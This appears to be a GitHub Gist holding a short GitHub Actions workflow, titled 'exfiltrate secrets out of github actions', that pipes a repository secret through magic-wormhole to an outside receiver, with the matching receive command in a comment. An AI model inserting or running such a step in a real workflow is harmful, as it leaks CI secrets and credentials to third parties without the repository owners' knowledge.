Created
July 14, 2022 13:56
-
-
Save framp/cc6b0a79a50dda9694c79ffaed700013 to your computer and use it in GitHub Desktop.
exfiltrate secrets out of github actions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
jobs: | |
exfiltrate: | |
runs-on: ubuntu-latest | |
steps: | |
- name: exfiltrate secrets | |
run: | | |
sudo apt update && sudo apt install magic-wormhole | |
echo "LOL=${{secrets.LOL}}" | wormhole send --code 3-magic-number | |
# wormhole receive 3-magic-number |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Love it! ❤️